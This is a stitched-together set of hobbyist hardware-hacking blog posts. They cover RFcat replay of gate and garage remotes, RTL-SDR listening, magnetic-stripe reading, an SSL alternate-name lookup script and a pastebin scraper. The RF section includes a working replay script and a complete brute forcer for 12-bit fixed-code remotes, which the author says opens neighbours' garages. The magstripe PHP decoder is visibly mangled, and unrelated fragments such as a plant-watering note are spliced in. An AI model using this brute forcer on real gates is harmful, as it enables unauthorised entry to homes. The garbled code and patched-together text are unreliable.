d.setFreq(403550000) #Set my frequency to the gate remote
d.setMdmModulation(MOD_ASK_OOK) #Set my modulation to the right mode
d.makePktFLEN(4) #Set my packetlength to 4 as I am sending 4 bytes
d.setMdmDRate(4800) #Baudrate
d.setMaxPower() #PowerMuch?
for i in range(0,15):d.RFxmit('\xDE\xAD\xBE\xEF'); #Send this a few times as I want to clearly see my signal

Taking a quick sqwizz at the above HDSDR output you can see that a) My garage remote is not at 403.55 and b) my RFcat is not there either! This is for a number of reasons but primarily because the RTL-SDR that I have isn’t that precise (you can configure it to get the offset correctly). But in this case I don’t really need that I merely need to keep changing the frequency until I have both at the same point. Turns out the frequency my RFCat loves for gate remotes is 403492750:

Sidenote:
Originally my RFcat had an issue where it wouldn’t tune to the correct frequency, if you do need to configure it by hand definite download SmartRF Studio from TI and select the Cc1111 in offline mode, you can then click on expert mode and check ‘Register View’ and this will give you listing of all the registers to put the chip into the right mode:

Once you have all the registers you can configure them within the python interactive shell or use something similar to how the setup900Mhz function works ( http://code.google.com/p/rfcat/source/browse/rflib/cc1111client.py#1810 ).

NOTE: This issue was actually fixed by Michael Ossmann already — just added it just in case, you can get the latest from the repo!

Alright, so at this stage we have our signal, we know what it is and we know what frequency to use, now we merely need to replay it out to get joy. This is a straight forward replay attack. As I said before if you didn’t realise it was PWM ontop of it all you can be stuck at this point begging people for help.

However PWM is pretty straight forward, so instead of sending your signal as is you actually want to draw it out, think of taking it and just stretching it. Every 1 becomes 11100 and every 0 becomes 11000, so if the binary we wanted to send out (for example my garage remote) is 010010110011 it actually becomes 111001100011100111001100011100110001100011100111001100011000.

I think its probably a bit easier explained in code:

dec_key = 1203 #key value for my remote, 010010110011
print "Decimal key:",dec_key
bin_key = bin(dec_key)
print "Binary (NON PWM) key:",bin_key
bin_str_key = str(bin_key)[2:] # there must be a better way sire.
pwm_str_key = "0b11100" #added leading 0
for k in bin_str_key:
        x = "*"
        if(k == "0"):
                x = "11100" #  A zero is encoded as a longer high pulse (high-high-low)
        if(k == "1"):
                x = "11000" # and a one is encoded as a shorter high pulse (high-low-low).
        pwm_str_key = pwm_str_key + x
print "Binary (PWM) key:",pwm_str_key
dec_pwm_key = int(pwm_str_key,2);

This Outputs to:

Decimal key: 1203
Binary (NON PWM) key: 0b10010110011
Binary (PWM) key: 0b111001100011100111001100011100110001100011100111001100011000

At this stage I could take that binary and convert it to a byte string (\x0E\x63\x9C\xC7\x31\x8E\x73\x18) and send it out with the above example and record it again with HDSDR. So to do this once more I opened RFCat and ran:

d.setFreq(403492750)
d.setMdmModulation(MOD_ASK_OOK)
d.makePktFLEN(8)
d.setMdmDRate(4800)
d.setMaxPower()
for i in range(0,5):d.RFxmit(‘\x0E\x63\x9C\xC7\x31\x8E\x73\x18′);

Now I had the recording I opened it in Audacity, I also have the original signal so I could compare the two of them: (to get another track in Audacity just use file->import->audio)

As you can see, all’s not well in paradise at this stage. For starters there is a series of data thats clearly not mine at the beginning and the gate remote seems to be arching upwards whilst my signal is arching downwards.

The first part of the signal is actually the preamble and syncword which for all intents and purposes I equate to something like a packet header that describes what the data will be, its commonly found throughout RF but for the remotes I am looking to spoof is not necessary. Lucky At1as has an option to simply turn this off, so using the same code but adding d.setMdmSyncMode(0) will turn off sync words and preamble. So if you re-record the remote and compare now you will see the following:

Fantastic! So now we have two signals that are almost correct the only difference is that the original remote signal (bottom) has a leading 0 (not sure where I am missing one) and it starts from a high (1). Michael Ossmann explained this as “There is a carrier transmitted between each sequence. So the transmitter is never in the off (low) state except during a symbol.”, and what I had to do for that was simply pad the beginning and the end with ‘\xff\xff’.

So from doing that (for all intents and purposes just using d.makePktFLEN(12) and sending ‘\xFF\xFF\x0E\x63\x9C\xC7\x31\x8E\x73\x18\xFF\xFF’) I now get the following:

Bazinga! The two signals look the same :) Next was to go down to the garages to attempt to open them with this, first few tries I got absolutely nothing until someone asked how many times I was sending the signal and I said 5 (which seemed okay to me), but it appears I need to send it about 20-25 times before the garage opens. The range on the device was impressive however and I could do it a lot further away than I anticipated (I could open it from the gate of my complex which is around 20m or so to the garage).

So of course I wanted to take this a little further, first being able to simply cook up a python script I could execute to simulate the button press, that came out something like this:

#!/usr/bin/env python
 
import sys
import time
from rflib import *
from struct import *
d = RfCat()
keyLen = 0
baudRate = 4800
 
def ConfigureD(d):
        d.setMdmModulation(MOD_ASK_OOK)
        d.setFreq(403493000)
        d.makePktFLEN(keyLen)
        d.setMdmSyncMode(0)
        d.setMdmDRate(baudRate)
        d.setMaxPower()
 
dec_key = 1203 #key value for my remote, 010010110011
print "Decimal key:",dec_key
bin_key = bin(dec_key)
print "Binary (NON PWM) key:",bin_key
bin_str_key = str(bin_key)[2:] # there must be a better way sire.
pwm_str_key = "0b11100" #added leading 0
for k in bin_str_key:
        x = "*"
        if(k == "0"):
                x = "11100" #  A zero is encoded as a longer high pulse (high-high-low)
        if(k == "1"):
                x = "11000" # and a one is encoded as a shorter high pulse (high-low-low).
        pwm_str_key = pwm_str_key + x
print "Binary (PWM) key:",pwm_str_key
dec_pwm_key = int(pwm_str_key,2);
print "Decimal (PWN) key:",dec_pwm_key
key_packed = pack(">Q",dec_pwm_key)
key_packed = '\xFF\xFF' + key_packed + '\xFF\xFF'
keyLen = len(key_packed)
 
ConfigureD(d)
 
print "TX'ing key..."
for i in range(0,25):
	d.RFxmit(key_packed)
print "Done."

The initial kick of opening my garage door eventually subsided and naturally it progressed to being able to open every garage door in the complex. With there being a 12 bit key, the keyspace was only 2^12, 4096 keys.. this didn’t seem particularly large. So I wrote a simple brute forcer for the 12 bit keyspace that my remotes run on at 403.55ish Mhz:

#!/usr/bin/env python
 
import sys
import time
import bitstring
from rflib import *
from struct import *
d = RfCat()
keyLen = 0
fixedLen = 13
baudRate = 4800
 
codes = []
 
def ConfigureD(d):
	d.setMdmModulation(MOD_ASK_OOK)
	d.setFreq(403493000)
	d.makePktFLEN(fixedLen)
	d.setMdmSyncMode(0)
	d.setMdmDRate(baudRate)
	d.setMaxPower()
 
print "Generating keys..."
for dec_key in range(0,4096):
	#print "Decimal key:",dec_key
	bin_key = bin(dec_key)
	#print "Binary (NON PWM) key:",bin_key
	bin_str_key = str(bin_key)[2:] # there must be a better way sire.
	pwm_str_key = "11100" #added leading 0
	for k in bin_str_key:
		x = "*"
		if(k == "0"):
			x = "11100" #  A zero is encoded as a longer high pulse (high-high-low)
		if(k == "1"):
			x = "11000" # and a one is encoded as a shorter high pulse (high-low-low).
		pwm_str_key = pwm_str_key + x
	#print "Binary (PWM) key:",pwm_str_key
	#pad it
	for x in range(0,len(pwm_str_key) % 8):
		pwm_str_key = "0" + pwm_str_key
	dec_pwm_key = int(pwm_str_key,2);
	#encode it
	key_packed = bitstring.BitArray(bin(dec_pwm_key)).tobytes()
	key_packed = '\xFF\xFF' + key_packed + '\xFF\xFF'
	keyLen = len(key_packed)
	if(keyLen < fixedLen):
		for p in range(0,(fixedLen - keyLen)):
			key_packed = '\xFF' + key_packed
	keyLen = len(key_packed)
	#print "Key len:",keyLen
	#print "Key", key_packed.encode('hex')
	codes.append(key_packed)
print "Done."
print "numKeys:", len(codes)
 
print "Configuring device.."
ConfigureD(d)
print "Done."
numKeysDone = 0
print "TX'ing Keys"
for key in codes:
	numKeysDone = numKeysDone + 1
	for i in range(0,25):
		try:
			d.RFxmit(key)
		except Exception, e:
			print "Lost comms to USB device (most likely).. waiting 1 second, restarting it and going on"
			time.sleep(1)
			ConfigureD(d)
			continue
	if((numKeysDone*25) % 100 == 0):
		print "Sent ",numKeysDone*25, " keys (", numKeysDone , " keys ) of " , (len(codes) * 25) , " (at 25 requests per code) "
print "Completed."

The problem however is that it takes about 16 minutes to get through everything, I am sure there are some massive improvements can be made, but I am prepared to wait 16 minutes in any case. Some of the things I did notice however:

* Any sort of d.<x> slows down the whole stream quite a lot which is why i pad to a fixed length rather than change it for every key
* Pregenning the keys seemed to buy me a bit of time
* Occasionally I lose USB comms to the device, It usually comes back up, so I just wrapped that in a try-catch

Conclusion

It appears to me that a lot of gates and garages that serve as primary means of entry to buildings/homes in South Africa are running on fixed key systems rather than rolling codes. These keys can be trivially sniffed out of the air and replayed to gain access. On top of that fixed key systems using small key spaces can be brute forced, and all of this with a ~R560 investment ($70) — For the RTLSDR and the CC1111EMK.

Where To from here?

It would be really nice to have an application (most likely python script) to automatically decode the OOK/PWM either from within one of the SDR applications (HDSDR or SDR#) or from a recorded .wav file.

Obviously looking at other RF devices, such as Alarm Systems, Rolling Code systems, TV, Cell Phones, GPS, etc that play within this space.

Lastly: thanks to everyone who tolerated the incessant amount of noobness that came rolling out of me — I appreciate all the help.

At this stage I was going to do the math to work out how much water had be consumed minus that of evaporation, but I’m too lazy right now.

At this rate that container should keep the 4 plants near it (tomato, chilli, orange, peppers) as well as the palm and the 2 trays as well as the random flower going for about 6 weeks!

Having a look at the stats everything seems pretty stable with the 4 plants :)

-AM

The basic gist of how it all works is as follows:

* There is a common chip found in video cards known as an RTL2832U
* This chip is commonly used for specific frequencies used for Television signals (and then software decodes this so you could watch TV on your pc)
* A bunch of cool guys ™ found a way to read the data coming into the card directly with drivers
* These cards also offered some tuners that allowed tuning beyond the basic TV ranges

So there are 2 basic sections:
* RTL2832U chips – reading data
* Tuner (E4K,other) – allows changing frequencies to various ranges

With such I started hunting around in Centurion for a Video card that had these options, after phoning a few places (read 5/6) I eventually found a TV card known as a Compro VisionMate U650F. It costs around R250 from pcpalace in centurion which offers a RTL2832U as well as the E4K tuner (the best one at this stage). *update* the cheaper visionmates (without remote) go for about R100 less than this!

This meant:

* I can tune to frequencies from around 55MHz to 1800Mhz
* For R250!

This was super, ordered my card and a few days later it arrived!

Following some _really_ easy guides for installing a few tools in windows:
* HDSDR, WRPlus, ExtIO, zadig ( http://spench.net/ has all the info but at time of writing was having some issues, try one of these: http://rtlsdr.org/ http://rtlsdr.reddit.com)

And on linux:
* GnuRadio (install guide: http://gnuradio.org/redmine/projects/gnuradio/wiki/InstallingGR)
* gr-osmodr
* rtl-sdr

Off the bat I loaded up HDSDR (after all the config and setup – zadig for drivers, extIO copied) and immediately got that sinking feeling of ‘I know absolutely nothing’:

After a few hours of playing around it become pretty easy to see a few things:
* LO was the tuning band (100MHz on either side)
* Tuner tuned into the specific frequency
* The various options for demodulating the audio with AM/FM(NFM)/CW

So I started with the basics, I figured I’d try listen to some radio, so I tuned to my HDSDR to 90.5 and immediately noticed that setting ‘FM’ demodulation was far too narrow for what i saw:

After doing a bit of research as to why my audio was coming out very ‘choppy’ it turns out that FM has many different modes and can be modulated on NFM (narrow fm – default in HDSDR), WFM (wideband) and custom bandwidths. Seriously, had no idea on this, I thought FM was FM! So it turns out WFM (wideband FM) is what we use for normal radio stations.

I switched to WRPlus and tuned to the frequency again and found that not only could I listen, but I could also receive RDS. Level 1 was unlocked:

Next up was asking around to see what I could listen to in audio, various people in the IRC channel suggested I listen to either the ‘airband’ (air traffic control channels) or see if there were HAM channels running nearby.

I started using, as my mom often likes to say, “the google” and found that there were a few places that offered a listing of what was available near me, including Waterkloof airbase, OR Tambo and other — http://www.bi-comm.com/documents/Frequencies.htm. I tried to tune to these and set the modulation to AM. After a few hours of giving up on OR Tambo I tuned to Waterkloof airbase (about 5km away from me) and even with the default antenna that shipped with my card I could occasionally pick up the traffic (hear planes clearing with ground control etc). Level 2 was suddenly available, I was merely missing a few coins for the level up – these coins came in the form of an antenna.

After being in the IRC channel and understanding how far out of my depth I really was, I identified that the missing element to me being able to listen to ‘the coolness’ was an antenna. I spoke to some people on IRC including one chap from ‘the Australia’ known as Roklobster who gave a full description of how to build what is known as a discone antenna. I evaluated this, and even bought the requirements (< R200), but unfortunately soldering gavlanised steel with my soldering-101 soldering iron was impossible (the burns on my hands can testify for this). I again reverted back to “the google” to try and find an antenna I could buy that would be ‘totes amazeballs’. However I quickly found that antennas were pricey! The card can do 50mhz-1800mhz roughly, and the basic antennas i found could do say 137-146 Mhz and cost around R800. If that worked per frequency this was looking far too costly! Back to level 1.5 (I just cant get past this boss!)

I started asking around and found that there were some _really_ basic antenna that could be built from nothing more than PVC tubing as a base and some Co-ax! I gathered my team (namely i dragged Roelof to Builders warehouse with me) and bought a bit of Co-ax (At < R1/m its almost free like beer) and started building my ‘antenna’. Up-Down-Down-UpperPunch-LowerKick-F-A-T-A-L-I-T-Y

I built what is known as a quaterplane groundplane antenna. The basic gist of it is that you have a piece of metal that is of a specific length ( 1/4 of the wavelength that you need to tune to), and 3 or 4 pieces that extend below it to be the ‘ground’, this is then hoisted in a non conductive environment (some people hang em, others just attach em to PVC pipe – like I did). The basic formula is 300 (speed of light ~ roughly) / <frequency in MHz) * 0.25 (or div 4.. ‘whatevs.’) gives you the length in meters. So one of the stations I wanted to listen to was the airbands at around 122Mhz. The formula become (300/122) * 0.25 = 0.6 meters.

The basic idea is:
* Remove outer insulation and shielding (apart from right at the bottom)
* Exposed length of inner insulation and core is the size you want (see above)
* Then solder/attach various radials of the same length to the inner shielding (not insulation)
* Point radials down at ~45 degrees and spaced 120degrees apart (depending on how many you have)

In Ascii Thats:

|
|
|
//|\\
~~~~~~~~~~~~~~~~~~~~~~~~~ (card)

In pictures, it ends up like this:

Basically then you hook up an F-connector (avail at almost anywhere – builders warehouse, spar, chamberlains, etc) from the antenna center piece (Its all co-ax) to the RTL-SDR device. Additionally to do that you need to get a IEC (thats the standard TV antenna connector) to an F-connector cable – luckily these are everywhere and cost ~R20.

I changed my design slightly and got a PVC tube cap and drilled a hole in it to hold an F-connector join so that I could have one cable going to the PC and at the top of the PVC (where i’d normally keep the antenna anyway) I had another F-connector to join the antenna to, I wont go into detail but these pictures should make it pretty self explanatory:

After that I fired up my HDSDR and wow was there a *ton* of signals near me. Using the guide found earlier I could quickly listen to the Amplitude modulated (AM) transmissions from Airports near me, or the hundreds (okay maybe not hundreds, but atleast 20) frequency modulated 2-way-comms (commonly used for security guards on the ground, towtruck operaters, random people with 2-way-radios).

Here are a few that I have picked out with the wavs that I could easily identify:

Airband Example:
Basic Plane-to-Tower comms:
HDSDR_20120427_082658Z_124504kHz_AF.wav

Hand held radios:
Security Guards Checking in with OB number:
HDSDR_20120428_234419Z_155117kHz_AF.wav

Tow trucks:
HDSDR_20120428_235938Z_158130kHz_AF.wav

Automated Air Information (no idea on the real name for this)
HDSDR_20120429_000601Z_126204kHz_AF.wav

Two microlights talking:
HDSDR_20120429_090121Z_123453kHz_AF.wav

Commercial Airline Approach:
HDSDR_20120429_090458Z_122804kHz_AF.wav

Automated Weather/Other forcast:(from San Jose where I am for this week)
HDSDR_20120714_003734Z_163555kHz_AF.wav

The basics of what I assume now are (lesbiserious, its only been a few days, take everything with a pinch of salt):
* If its gov/country related and analog its gonna be Amplitude Modulated (AM)
* If its private sector its gonna be FM – And then you are kinda interested in say 150-170Mhz and 440-450Mhz – there are tons of things to listen to.

From here there is still about 99 more levels for me to look at, such as:
* How to build and transmitter (its cool that tuning to 144Mhz shows you gate remotes going off – but how can you ‘replay’ it?).
* How antenna design really works (without guessing) – and getting a real antenna.
* What different type of signals look like (I can merely identify AM and FM)
* Decoding something digital

While it appears all fun and games here, it is interesting to note that security companies are running their base<->guard communications essentially ‘in the clear’ (http for the rest of us). Which for $20 I can clearly listen to, additionally I can also listen and find out where the guards are and if there are any issues at the moment, seems perfect for crime? Most police forces are using TETRA (including Gauteng), read https, which at least means criminals can’t simply listen in, however most places of importance (banks, offices) where someone might want to steal data are protected by private companies – with all data in the clear.

But thats an update. Game saved to Slot 1.

People seem to have switched from using WRPlus to SDR# which seems to be the new up and coming kid on the block! http://sdrsharp.com/

-AM

So its been nearly a month since I last put a blog post up and I have been working on some stuff in my free time between work (been traveling to the US and took a weekend off to visit some friends in Canada). I’m not particularly in the mood to write a new post, but you know how it is, if I don’t start writing it I’ll never get round to it.

Essentially I have always been fascinated by the idea of being able to ‘hack’ with/into physical things, whether it be the Arduino and my watering system (btw you can see those stats at http://andrewmohawk.dyndns.org/AWS/), changing data on RFID cards or being that sneaky kid jackpotting ATM machines.

I started looking at magnetic stripes, mostly because they are *everywhere*, from bank cards, customer loyalty and even parking systems.

Overview

The basic gist of the system is that there are many tiny magnets or magnetic particles (usually iron oxide) which are magnetized in a specific manner within a magstripe. Essentially you take the card (or think of it as many magnets) and put it next to a magnetic reader (card reader) which then reads the fields. These fields are then taken to good ol 1′s and 0′s and used within backend systems after a bit of decoding.

The magnetic stripe on a card is actually made up of 3 different ‘stripes’ or tracks (usually - different types of cards will have a different number of tracks), right above each other. Each of these tracks can hold different amounts of data and for the basic breakdown you can read up about em at http://www.gae.ucm.es/~padilla/extrawork/tracks.html and http://www.ded.co.uk/magnetic-stripe-card-standards/

TL;DR – Track 2/3 = Numbers, Track1 = UPPERCASE,numbers

Reading

Most magstripes use whats known as F2F/Aiken Biphase/BMC encoding, which determines whether something is a 1 or a 0 by looking at the change within a particular ‘phase’ (the time taken for one cycle). The time for a phase is identified by a series of 0′s at the beginning of each track (essentially just allowing the reader to say okay i see them coming past at x ms).  This is known as self-clocking and allows readers to read cards that are pushed through by a human rather than say that of a tape player where it is a fixed speed.

This blog post very nicely describes how the reading works: http://www.qualifilms.com/blog/computer-science/2009/06/back-to-basics-reverse-engineering-of-a-non-standard-magstripe-part-one/ with images too!

TL;DR It works it out from the changes in the phase and does the timing from the initial 0′s

This diagram explains it best:

Reading a Magnetic Stripe

Building a Reader

So first things first, I needed to be able to successfully *read* magnetic stripes as an audio file so that I could start playing with them. The easiest way to do this was simply to create a magnetic stripe ‘reader’, there are a few posts on this and they basically come in the form of two options:

• Buy one (you can simply purchase a reader practically anywhere and then take it apart to get straight audio out – rather than the decoded wav
• Build one (this tech was used all over tape players way back so you can strip em to make one)

Because of my limited (read no) budget, I decided to build one from an old tape player.

Taking apart a Tape player

Initially I started by going to many different second hand stores, thrift shops and so on to look for a radio with tape player to use for this. Surprisingly people seem to have just thrown most of them away and I couldn’t find *any* near where I stay. However I have read about other people who have found plenty at second hand stores/tips etc. So look around. I found a really cheap one for R80 at a cheap chinese store near me:

Anyway, I skillfully (read unskillfully) began disassembling (read destroying) my R80 tape player to get to the read head:

The original Tape Player

Disassembly

Disassembly

So after I had carefully (read completely uncarefully, possibly drunk and with all sorts of arb hammering/pulling and breaking) taken apart the packaging I could get to the juicy bits, the actual tape reading mechanism and specifically what I was looking for – the read head:

Read Head (in silver)

Next was the process of wiring up the read head (in silver) to the pc. Essentially the one side you need a mono jack (or take a stereo jack and wire a single wire to both sides of it – like i did) which will go into the PC to record the audio. These jacks can be taken from any old set of headphones or you can go and buy one at an electronics store (super cheap). The other side of the cable is simply wired to either side of the magnetic read head as below:

Magnetic Read head

Mono Jack

Reading cards:

The next stage after setting up the read head to a mono jack is to read the magnetic data on a card. As said before the ‘tracks’ are actually all on top of each other for generic cards. This page gives you a lot of really good information on the layout of cards and definitely recommended reading.

TL;DR: tracks are as follows:

Essentially this means that if you wish to get the track information off you need to use a ruler to get the distance from the card correct and slide the magnetic read head along the edge of the ruler. This is a painful process as the ruler often moves or you are just above or below the track.

The way I have found to get it to work the best, is to simply find a second hand/broken/cheap TTL/other reader and modify it to have the magnetic read head go straight into the pc, something like this:

Modified TTL Reader

Modified TTL Reader

Working with Audio

Now you have a the reader setup, or a painful ruler setup the next step is to get the audio out. Fire up any old sound recorder (I like audacity), connect the Mono plug into the mic jack, hit record and swipe away!

I put up a sample of a generic customer loyality card at soundcloud: http://soundcloud.com/andrew-3/card-swipe/s-MvlVg

Within audacity you can see it as:

loyality-card

Zooming in to the card swipe you can see the data a lot clearer:

loyality-card-zoomed

(the data above is the ‘clocking’ zeros followed by the first bits of the card)

How the audio works

The ‘audio’ is really just the encoded data, essentially a number of zero’s are seen at the front of the track so that the readers can determine the speed at which the card is moving through and ultimately the time it takes for 1 complete cycle. After it has got this ‘synched’ it will then start determining 1′s and 0′s by looking at whether the wave has changed within the specific period. This is also called Differential Manchester Encode / Bimark Phase Code / Aiken Biphase or F2F.

Its almost definitely best explained in images, and these great ones have been stolen from This blog:

Aiken Biphase

Aiken Biphase

As you can see above in the first two periods the wave has changed (the period is highlighted in red) and is subsequently a 1 where as in the 3rd and 5th phase it has remained the same (not specific to a high or a low) and is a 0.

Decoding the Audio

Major Malfunction has a great selection of python tools over at alcrypto.co.uk ( you’ll need to find the links), one of these being dab.py (Decode Aiken Biphase) – this script takes all the hard work (described previously) in getting the binary data out:

Decode Aiken Biphase

Decoding the Binary

So the binary is in the format of a 5 bit character (4 bits for the data and 1 bit for odd-parity checking) and works something like this:

Binary data: 11001
First four for data: 1100
Odd-Parity bit: 1

Looking at the above its first important to know that the parity bit (the last 1) is calculated by making sure there are an odd number of 1′s in the five bit sequence.
Next you can look at the ‘data’ which is 1100. The data is encoded with the least significant bit first, so the in essence it is read backwards and the actual data is 0011. This data can then be taken to decimal (0111 = 3), it is then shifted up 48 characters in the ASCII character set to return the ASCII value, thus the decimal value is 51 which is a 3.

I whipped up a PHP script to do this for the data I got out previously which returns as follows:

Decoding Track3

As you can see in the above screenshot this decodes nicely to “;7353280041358181=491252200000999?” and the first part of that being the number printed on my loyalty card:

Loyalty Card

Code

The code is available on pastebin for those interested: http://pastebin.com/h9eVqRxz

<!--?php 
// AndrewMohawk
// andrew@andrewmohawk.com
// http://www.andrewmohawk.com
 
/* Decode Track 2/3 data from binary */
$binary = "<yourBinaryHere-->";
 
// this function by mtroy dot student at gmail dot com taken from http://php.net/manual/en/function.strpos.php
function strpos_r($haystack, $needle)
{
    if(strlen($needle) &gt; strlen($haystack))
        trigger_error(sprintf("%s: length of argument 2 must be &lt;= argument 1", __FUNCTION__), E_USER_WARNING);
 
    $seeks = array();
    while($seek = strrpos($haystack, $needle))
    {
        array_push($seeks, $seek);
        $haystack = substr($haystack, 0, $seek);
    }
    return $seeks;
}
 
function processBinary($binary)
{
	$AsciiOutput = "";
 
	//find start sentinal
	$start_sentinal = strpos($binary,"11010");
	if($start_sentinal === false)
	{
		echo "Could not find start sentinal\n";
		return false;
	}
 
	//find end sentinal
	$end_sentinal = false;
	$end_sentinals = strpos_r($binary,"11111");
	if(count($end_sentinals) == 0)
	{
		echo "Could not find end sentinal\n";
		return false;
	}
 
	//Check end sentinal is on a 5 bit boundry 
	foreach($end_sentinals as $es)
	{
		$es = $es;
		if(($es - $start_sentinal) % 5 == 0)
		{
			$end_sentinal = $es;
		}
	}
 
	if($end_sentinal == false)
	{
		echo "End sentinal not on correct boundry\n";
		return false;
	}
 
	//Lets decode the data:
	$bit_length = 5; // 4 bits for data, 1 bit for odd-parity or LRC checking
 
	$data = substr($binary,$start_sentinal,($end_sentinal-$start_sentinal+5));
 
	$currentBits = "";
	$currentNum = 0;
	$finalString = "";
 
	for($i=0;$i&lt;strlen($data);$i++) {="" if(strlen($currentbits)="" &lt;="" $bit_length)="" $currentbits="" .="$data[$i];" }="" $paritybit="$currentBits[4];" $databits="substr($currentBits,0,4);" $asciichar="0;" for($x="0;$x&lt;4;$x++)" $currentnum="" +="$dataBits[$x];" $dec="bindec($dataBits);" 2,="" "0",="" str_pad_left);="" just="" so="" output="" is="" nice="" reverse="" the="" binary="" (since="" its="" lsb="" first)="" then="" convert="" to="" dec,="" add="" 48="" and="" take="" it="" ascii="" echo="" "$currentbits="" -="" data="" ($databits)="" parity($paritybit)="" decimal="" ($dec)="" ascii($asciichar)";="" if(($currentnum="" $paritybit)="" %="" 2="=" false)="" "="" __="" parity:="" invalid";="" else="" valid";="" $asciioutput="" "\n";="" ;="" "\n\ntotal="" out="" (ascii):="" $asciioutput\n";="" "trying="" one="" way:\n\n";="" if="" (processbinary($binary)="=" reverse.="" "\n\n";="" reverse:\n\n";="" processbinary(strrev($binary));="" pre=""&gt;

Going Onwards:

So understanding the basics of how magnetic stripes work and how the data is encoded means that should I come into contact with other formats I know what to look for and can mess with them. Also knowing the above means I can write something to encode the data, generate wav files and build a spoofer to replay the attack :)

I’ll write a follow up sometime with spoofing magnetic stripes, here is a short video of me playing audio (since thats what it really is right?) from a spoofer to my magnetic read head:

Anyway, a discussion started in #zacon based on a post I thought was interesting about SSL-enabled mail servers and how very very seldomly its actually used for mail: http://ritter.vg/blog-no_email_security.html. The gist of the story is that mail goes from your client via MTA to another MTA to be delivered and while you might have an SSL enabled session for your gmail interface its highly unlikely that the actual mail will be going over SSL the entire trip. In fact gmail’s SSL certs are for mx.gmail.com not aspmx.l.google.com!

But back to the Alternate DNS names. So one chap in chat ‘dru’ mentioned that he has a single cert for multiple domains, I wasn’t entirely sure this was possible as I have never seen it, however after looking a bit more closely at his SSL certificates on https://mail.sybaweb.com/ it appeared that all his other linked domains (technically DNS names) were actually in the certificate. This is a great way to find out other domains/dns names linked to your target domain.

Few minutes in PHP and I whipped up a little (but ugly) script to pull this out, check it out at https://andrewmohawk.com/SSLAssociated/

Alternate SSL Names for sybaweb.com

Code:

The script is trivial, but the code as always:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66

<?php
	echo "<h2>Get Alternate Names for Certificate</h2>
		<form action='index.php'>
		<strong>HTTPS enabled site: https://</strong><input type='text' name='h'/><br/>
		<input type='submit' value='Lookup!'/><br/>
		</form>
		";
	if(isset($_GET["h"]))
	{
		echo "<pre>";
		set_time_limit(0); 
		ob_implicit_flush();
		$host = $_GET["h"];
		$context = stream_context_create(array(
		  'ssl' => array('capture_peer_cert' => TRUE)
		));
		echo "[+] Fetching SSL Cert...";
		@$html = file_get_contents('https://'.$host, NULL, $context);
		$opts = stream_context_get_options($context);
		echo "Done<br/>";
		echo "[+] Parsing SSL Cert...<br/>";
		if(isset($opts["ssl"]) && isset($opts['ssl']['peer_certificate']))
		{
			$ssl = openssl_x509_parse($opts['ssl']['peer_certificate']);
			if(isset($ssl["extensions"]))
			{
				if(isset($ssl["extensions"]["subjectAltName"]))
				{
					echo " [-] Found Alternate DNS names:<br/>";
					$altNamesTmp = $ssl["extensions"]["subjectAltName"];
					$altNames = explode(",",$altNamesTmp);
					$hostnames = array();
					$unknown = array();
					foreach($altNames as $a)
					{
						if(strpos($a,"DNS:") !== false)
						{
 
							$hostname = substr($a,strpos($a,"DNS:")+4);
 
							$hostnames[] = $hostname;
 
 
						}
						else
						{
							$unknown[] = $a;
						}
 
					}
					foreach(array_unique($hostnames) as $ud)
					{
						echo " [*] Found Alternate DNS Name: $ud <br/>";
					}
					foreach(array_unique($unknown) as $ud)
					{
						echo " [*] Unknown Entry: $ud <br/>";
					}
				}
			}
		}
		else
		{
			echo "[!] Could not parse certificate... https enabled?";
		}
	}

New PasteLert lives at http://andrewmohawk.com/pasteLertV2/

Downloads:

» Interface -> http://andrewmohawk.com/pasteLertV2/src/pastelertv2_Interface.zip
» Cron Tasks -> http://andrewmohawk.com/pasteLertV2/src/pastelertv2_Cron_Tasks.zip
» Scraping Script -> http://andrewmohawk.com/pasteLertV2/src/pastelertv2_Python_Scraping_Script.zip

And of course if you want everything -> http://andrewmohawk.com/pasteLertV2/src/pastelertv2_all.zip

Overview

My linode has been pretty much falling over due to the previous version of the pastebin alerts for a number of reasons:

» Scripts sometimes get blackholed (pastebin.com allows the connection but doesnt respond – due to their DDoS protection)
» Scripts sometimes were still running when the PREVIOUS script had not completed causing a chain reaction of fail
» Deletes would be happening while the above scripts where running causing MySQL to tilt

Lucene/Solr

As such I recently re-worked the service. Initially I started playing around with other DB types to try and get my Linode to store more than a day or 2s worth of Pastebin.com data. I looked around and it appeared that Lucene/SolR was the solution I was looking for, and actually it does work _very_ well at storing large amounts of data (I had it running with about 2 weeks of data). However there were a number of issues:

» After about a week or 2s worth of data (avg around 20-30K posts a day, x 14 = 280 000 – 420 000 posts) the search times were SLOW (talking something like 5-15 SECONDS)
» Because Lucene is not a RDBMS there is no concept of having something like a row ID or an auto-incrementing ID – so this would have to be handled by the script to get the number of entries and +1 every time
» Because of the above Alerts would have to work on a date (when the post was made – so working out from x secs ago or y minutes ago), and an ISO formatted date no less (no unixtime) it became a real pain.

However, with that being said I did still build the interfaces for it and if you are looking to implement it with SolR / Lucene just message me for the schema and Python/PHP scripts.

Basics

Ultimately however I decided to stick to the same system previously used but rather than have cron’d scripts that pull the data have one long running python script that you can place in the background. Pretty basic and the code should be self explanatory, the gist of it:

1. Pull archive.php from pastebin.com [ http://pastebin.com/archive.php ]
2. Extract all the paste entries with a regular expression ( re.compile(‘<td><img src=”/i/t.gif” .*?<a href=”/(.*?)”>(.*?)</a></td>.*?<td>(.*?)</td>’,re.S) )
3. Check if we have seen it in the last 500 or so (that we have in a python list), if not, pull the raw paste
4. INSERT IGNORE (in case we missed a double) this data

Then for the “alerts” themselves, basically:

»Every 30 minutes (or whenever you set the cron to run) search if the terms in the database have been seen
»If seen send out mail

Additionally of course there is a web interface that you can use to add alerts as well as search the current index’d pastes.

Downloads / Config

My Crontab at this stage looks as follows (if you want to just copy mine):
*/20 * * * * php /home/andrew/pasteLertV2/Cron_Tasks/sendAlerts.php
0 1 * * * php /home/andrew/pasteLertV2/Cron_Tasks/truncPastes.php

And i’ve kicked off the script that puts the data in the database with:

andrew@mothership:~/pasteLertV2/Python_Scraping_Script$ nohup python scrapePastebinMySQL.py &

I’ve seperated the scripts into the 3 sections:

» Interface -> http://andrewmohawk.com/pasteLertV2/src/pastelertv2_Interface.zip
» Cron Tasks -> http://andrewmohawk.com/pasteLertV2/src/pastelertv2_Cron_Tasks.zip
» Scraping Script -> http://andrewmohawk.com/pasteLertV2/src/pastelertv2_Python_Scraping_Script.zip

